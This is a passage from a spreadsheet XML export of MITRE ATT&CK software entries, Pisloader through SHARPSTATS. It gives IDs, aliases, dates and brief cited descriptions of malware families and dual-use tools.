    <t>Pisloader</t>
  </si>
  <si>
    <t>[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0124</t>
  </si>
  <si>
    <t>S0013</t>
  </si>
  <si>
    <t>PlugX</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0013</t>
  </si>
  <si>
    <t>20 June 2020</t>
  </si>
  <si>
    <t>DestroyRAT, Kaba, Korplug, Sogu</t>
  </si>
  <si>
    <t>S0428</t>
  </si>
  <si>
    <t>PoetRAT</t>
  </si>
  <si>
    <t>[PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0428</t>
  </si>
  <si>
    <t>27 April 2020</t>
  </si>
  <si>
    <t>S0012</t>
  </si>
  <si>
    <t>PoisonIvy</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0012</t>
  </si>
  <si>
    <t>Darkmoon, Poison Ivy</t>
  </si>
  <si>
    <t>Darren Spruell</t>
  </si>
  <si>
    <t>S0518</t>
  </si>
  <si>
    <t>PolyglotDuke</t>
  </si>
  <si>
    <t>[PolyglotDuke](https://attack.mitre.org/software/S0518) is a downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2013. [PolyglotDuke](https://attack.mitre.org/software/S0518) has been used to drop [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0518</t>
  </si>
  <si>
    <t>S0453</t>
  </si>
  <si>
    <t>Pony</t>
  </si>
  <si>
    <t>[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0453</t>
  </si>
  <si>
    <t>21 May 2020</t>
  </si>
  <si>
    <t>25 June 2020</t>
  </si>
  <si>
    <t>Arie Olshtein, Check Point; Kobi Eisenkraft, Check Point</t>
  </si>
  <si>
    <t>S0378</t>
  </si>
  <si>
    <t>PoshC2</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1059/001). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0378</t>
  </si>
  <si>
    <t>S0177</t>
  </si>
  <si>
    <t>Power Loader</t>
  </si>
  <si>
    <t>[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0177</t>
  </si>
  <si>
    <t>Win32/Agent.UAW</t>
  </si>
  <si>
    <t>S0139</t>
  </si>
  <si>
    <t>PowerDuke</t>
  </si>
  <si>
    <t>[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0139</t>
  </si>
  <si>
    <t>S0441</t>
  </si>
  <si>
    <t>PowerShower</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0441</t>
  </si>
  <si>
    <t>08 May 2020</t>
  </si>
  <si>
    <t>20 May 2020</t>
  </si>
  <si>
    <t>S0194</t>
  </si>
  <si>
    <t>PowerSploit</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0194</t>
  </si>
  <si>
    <t>S0393</t>
  </si>
  <si>
    <t>PowerStallion</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1059/001) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0393</t>
  </si>
  <si>
    <t>21 June 2019</t>
  </si>
  <si>
    <t>S0113</t>
  </si>
  <si>
    <t>Prikormka</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) is a malware family used in a campaign known as Operation Groundbait. It has predominantly been observed in Ukraine and was used as early as 2008. (Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0113</t>
  </si>
  <si>
    <t>S0279</t>
  </si>
  <si>
    <t>Proton</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) is a macOS backdoor focusing on data theft and credential access  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0279</t>
  </si>
  <si>
    <t>22 January 2021</t>
  </si>
  <si>
    <t>S0238</t>
  </si>
  <si>
    <t>Proxysvc</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0238</t>
  </si>
  <si>
    <t>S0029</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0029</t>
  </si>
  <si>
    <t>S0078</t>
  </si>
  <si>
    <t>Psylo</t>
  </si>
  <si>
    <t>[Psylo](https://attack.mitre.org/software/S0078) is a shellcode-based Trojan that has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). It has similar characteristics as [FakeM](https://attack.mitre.org/software/S0076). (Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0078</t>
  </si>
  <si>
    <t>S0147</t>
  </si>
  <si>
    <t>Pteranodon</t>
  </si>
  <si>
    <t>[Pteranodon](https://attack.mitre.org/software/S0147) is a custom backdoor used by [Gamaredon Group](https://attack.mitre.org/groups/G0047). (Citation: Palo Alto Gamaredon Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0147</t>
  </si>
  <si>
    <t>S0192</t>
  </si>
  <si>
    <t>Pupy</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0192</t>
  </si>
  <si>
    <t>13 May 2020</t>
  </si>
  <si>
    <t>Android, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>S0583</t>
  </si>
  <si>
    <t>Pysa</t>
  </si>
  <si>
    <t>[Pysa](https://attack.mitre.org/software/S0583) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.(Citation: CERT-FR PYSA April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0583</t>
  </si>
  <si>
    <t>Mespinoza</t>
  </si>
  <si>
    <t>S0269</t>
  </si>
  <si>
    <t>QUADAGENT</t>
  </si>
  <si>
    <t>[QUADAGENT](https://attack.mitre.org/software/S0269) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0269</t>
  </si>
  <si>
    <t>S0262</t>
  </si>
  <si>
    <t>QuasarRAT</t>
  </si>
  <si>
    <t>[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that is publicly available on GitHub. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language. (Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0262</t>
  </si>
  <si>
    <t>xRAT</t>
  </si>
  <si>
    <t>S0055</t>
  </si>
  <si>
    <t>RARSTONE</t>
  </si>
  <si>
    <t>[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0055</t>
  </si>
  <si>
    <t>S0241</t>
  </si>
  <si>
    <t>RATANKBA</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0241</t>
  </si>
  <si>
    <t>S0495</t>
  </si>
  <si>
    <t>RDAT</t>
  </si>
  <si>
    <t>[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0495</t>
  </si>
  <si>
    <t>28 July 2020</t>
  </si>
  <si>
    <t>15 October 2020</t>
  </si>
  <si>
    <t xml:space="preserve">RDAT </t>
  </si>
  <si>
    <t>S0416</t>
  </si>
  <si>
    <t>RDFSNIFFER</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0416</t>
  </si>
  <si>
    <t>16 October 2019</t>
  </si>
  <si>
    <t>S0496</t>
  </si>
  <si>
    <t>REvil</t>
  </si>
  <si>
    <t>[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0496</t>
  </si>
  <si>
    <t>04 August 2020</t>
  </si>
  <si>
    <t>Sodin, Sodinokibi</t>
  </si>
  <si>
    <t>S0258</t>
  </si>
  <si>
    <t>RGDoor</t>
  </si>
  <si>
    <t>[RGDoor](https://attack.mitre.org/software/S0258) is a malicious Internet Information Services (IIS) backdoor developed in the C++ language. [RGDoor](https://attack.mitre.org/software/S0258) has been seen deployed on webservers belonging to the Middle East government organizations. [RGDoor](https://attack.mitre.org/software/S0258) provides backdoor access to compromised IIS servers. (Citation: Unit 42 RGDoor Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0258</t>
  </si>
  <si>
    <t>S0003</t>
  </si>
  <si>
    <t>RIPTIDE</t>
  </si>
  <si>
    <t>[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0003</t>
  </si>
  <si>
    <t>S0112</t>
  </si>
  <si>
    <t>ROCKBOOT</t>
  </si>
  <si>
    <t>[ROCKBOOT](https://attack.mitre.org/software/S0112) is a [Bootkit](https://attack.mitre.org/techniques/T1542/003) that has been used by an unidentified, suspected China-based group. (Citation: FireEye Bootkits)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0112</t>
  </si>
  <si>
    <t>S0240</t>
  </si>
  <si>
    <t>ROKRAT</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0240</t>
  </si>
  <si>
    <t>S0148</t>
  </si>
  <si>
    <t>RTM</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/software/S0148) is custom malware written in Delphi. It is used by the group of the same name ([RTM](https://attack.mitre.org/groups/G0048)). Newer versions of the malware have been reported publicly as Redaman.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0148</t>
  </si>
  <si>
    <t>Redaman</t>
  </si>
  <si>
    <t>S0481</t>
  </si>
  <si>
    <t>Ragnar Locker</t>
  </si>
  <si>
    <t>[Ragnar Locker](https://attack.mitre.org/software/S0481) is a ransomware that has been in use since at least December 2019.(Citation: Sophos Ragnar May 2020)(Citation: Cynet Ragnar Apr 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0481</t>
  </si>
  <si>
    <t>S0565</t>
  </si>
  <si>
    <t>Raindrop</t>
  </si>
  <si>
    <t>[Raindrop](https://attack.mitre.org/software/S0565) is a loader used by [APT29](https://attack.mitre.org/groups/G0016) that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was discovered in January 2021 and was likely used since at least May 2020.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0565</t>
  </si>
  <si>
    <t>19 January 2021</t>
  </si>
  <si>
    <t>S0458</t>
  </si>
  <si>
    <t>Ramsay</t>
  </si>
  <si>
    <t>[Ramsay](https://attack.mitre.org/software/S0458) is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between [Ramsay](https://attack.mitre.org/software/S0458) and the [Darkhotel](https://attack.mitre.org/groups/G0012)-associated Retro malware.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0458</t>
  </si>
  <si>
    <t>Harry Kim, CODEMIZE</t>
  </si>
  <si>
    <t>S0364</t>
  </si>
  <si>
    <t>RawDisk</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0364</t>
  </si>
  <si>
    <t>S0169</t>
  </si>
  <si>
    <t>RawPOS</t>
  </si>
  <si>
    <t>[RawPOS](https://attack.mitre.org/software/S0169) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. (Citation: Kroll RawPOS Jan 2017) (Citation: TrendMicro RawPOS April 2015) (Citation: Visa RawPOS March 2015) FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0169</t>
  </si>
  <si>
    <t>DRIFTWOOD, DUEBREW, FIENDCRY</t>
  </si>
  <si>
    <t>Walker Johnson</t>
  </si>
  <si>
    <t>S0172</t>
  </si>
  <si>
    <t>Reaver</t>
  </si>
  <si>
    <t>[Reaver](https://attack.mitre.org/software/S0172) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://attack.mitre.org/techniques/T1218/002) items.(Citation: Palo Alto Reaver Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0172</t>
  </si>
  <si>
    <t>S0153</t>
  </si>
  <si>
    <t>RedLeaves</t>
  </si>
  <si>
    <t>[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0153</t>
  </si>
  <si>
    <t>BUGJUICE</t>
  </si>
  <si>
    <t>S0075</t>
  </si>
  <si>
    <t>Reg</t>
  </si>
  <si>
    <t>[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)
Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0075</t>
  </si>
  <si>
    <t>reg.exe</t>
  </si>
  <si>
    <t>S0511</t>
  </si>
  <si>
    <t>RegDuke</t>
  </si>
  <si>
    <t>[RegDuke](https://attack.mitre.org/software/S0511) is a first stage implant written in .NET and used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2017. [RegDuke](https://attack.mitre.org/software/S0511) has been used to control a compromised machine when control of other implants on the machine was lost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0511</t>
  </si>
  <si>
    <t>S0019</t>
  </si>
  <si>
    <t>Regin</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://attack.mitre.org/software/S0019) timestamps date back to 2003. (Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0019</t>
  </si>
  <si>
    <t>S0332</t>
  </si>
  <si>
    <t>Remcos</t>
  </si>
  <si>
    <t>[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0332</t>
  </si>
  <si>
    <t>S0375</t>
  </si>
  <si>
    <t>Remexi</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0375</t>
  </si>
  <si>
    <t>S0166</t>
  </si>
  <si>
    <t>RemoteCMD</t>
  </si>
  <si>
    <t>[RemoteCMD](https://attack.mitre.org/software/S0166) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to execute commands on a remote system similar to SysInternal's PSEXEC functionality. (Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0166</t>
  </si>
  <si>
    <t>S0592</t>
  </si>
  <si>
    <t>RemoteUtilities</t>
  </si>
  <si>
    <t>[RemoteUtilities](https://attack.mitre.org/software/S0592) is a legitimate remote administration tool that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021 for execution on target machines.(Citation: Trend Micro Muddy Water March 2021)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0592</t>
  </si>
  <si>
    <t>S0125</t>
  </si>
  <si>
    <t>Remsec</t>
  </si>
  <si>
    <t>[Remsec](https://attack.mitre.org/software/S0125) is a modular backdoor that has been used by [Strider](https://attack.mitre.org/groups/G0041) and appears to have been designed primarily for espionage purposes. Many of its modules are written in Lua. (Citation: Symantec Strider Blog)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0125</t>
  </si>
  <si>
    <t>Backdoor.Remsec, ProjectSauron</t>
  </si>
  <si>
    <t>S0174</t>
  </si>
  <si>
    <t>Responder</t>
  </si>
  <si>
    <t>Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0174</t>
  </si>
  <si>
    <t>S0379</t>
  </si>
  <si>
    <t>Revenge RAT</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) is a freely available remote access tool written in .NET (C#).(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0379</t>
  </si>
  <si>
    <t>02 May 2019</t>
  </si>
  <si>
    <t>S0433</t>
  </si>
  <si>
    <t>Rifdoor</t>
  </si>
  <si>
    <t>[Rifdoor](https://attack.mitre.org/software/S0433) is a remote access trojan (RAT) that shares numerous code similarities with [HotCroissant](https://attack.mitre.org/software/S0431).(Citation: Carbon Black HotCroissant April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0433</t>
  </si>
  <si>
    <t>S0448</t>
  </si>
  <si>
    <t>Rising Sun</t>
  </si>
  <si>
    <t>[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0448</t>
  </si>
  <si>
    <t>S0400</t>
  </si>
  <si>
    <t>RobbinHood</t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0400</t>
  </si>
  <si>
    <t>29 July 2019</t>
  </si>
  <si>
    <t>S0270</t>
  </si>
  <si>
    <t>RogueRobin</t>
  </si>
  <si>
    <t>[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0270</t>
  </si>
  <si>
    <t>S0090</t>
  </si>
  <si>
    <t>Rover</t>
  </si>
  <si>
    <t>[Rover](https://attack.mitre.org/software/S0090) is malware suspected of being used for espionage purposes. It was used in 2015 in a targeted email sent to an Indian Ambassador to Afghanistan. (Citation: Palo Alto Rover)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0090</t>
  </si>
  <si>
    <t>S0358</t>
  </si>
  <si>
    <t>Ruler</t>
  </si>
  <si>
    <t>[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0358</t>
  </si>
  <si>
    <t>04 February 2019</t>
  </si>
  <si>
    <t>Office 365, Windows</t>
  </si>
  <si>
    <t>S0253</t>
  </si>
  <si>
    <t>RunningRAT</t>
  </si>
  <si>
    <t>[RunningRAT](https://attack.mitre.org/software/S0253) is a remote access tool that appeared in operations surrounding the 2018 Pyeongchang Winter Olympics along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [Brave Prince](https://attack.mitre.org/software/S0252). (Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0253</t>
  </si>
  <si>
    <t>S0446</t>
  </si>
  <si>
    <t>Ryuk</t>
  </si>
  <si>
    <t>[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0446</t>
  </si>
  <si>
    <t>Matt Brenton, Zurich Insurance Group; The DFIR Report, @TheDFIRReport</t>
  </si>
  <si>
    <t>S0085</t>
  </si>
  <si>
    <t>S-Type</t>
  </si>
  <si>
    <t>[S-Type](https://attack.mitre.org/software/S0085) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2013 to 2014. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0085</t>
  </si>
  <si>
    <t>S0461</t>
  </si>
  <si>
    <t>SDBbot</t>
  </si>
  <si>
    <t>[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0461</t>
  </si>
  <si>
    <t>01 June 2020</t>
  </si>
  <si>
    <t>29 March 2021</t>
  </si>
  <si>
    <t>S0195</t>
  </si>
  <si>
    <t>SDelete</t>
  </si>
  <si>
    <t>[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0195</t>
  </si>
  <si>
    <t>S0185</t>
  </si>
  <si>
    <t>SEASHARPEE</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [OilRig](https://attack.mitre.org/groups/G0049). (Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0185</t>
  </si>
  <si>
    <t>S0450</t>
  </si>
  <si>
    <t>SHARPSTATS</t>
  </si>
  <si>
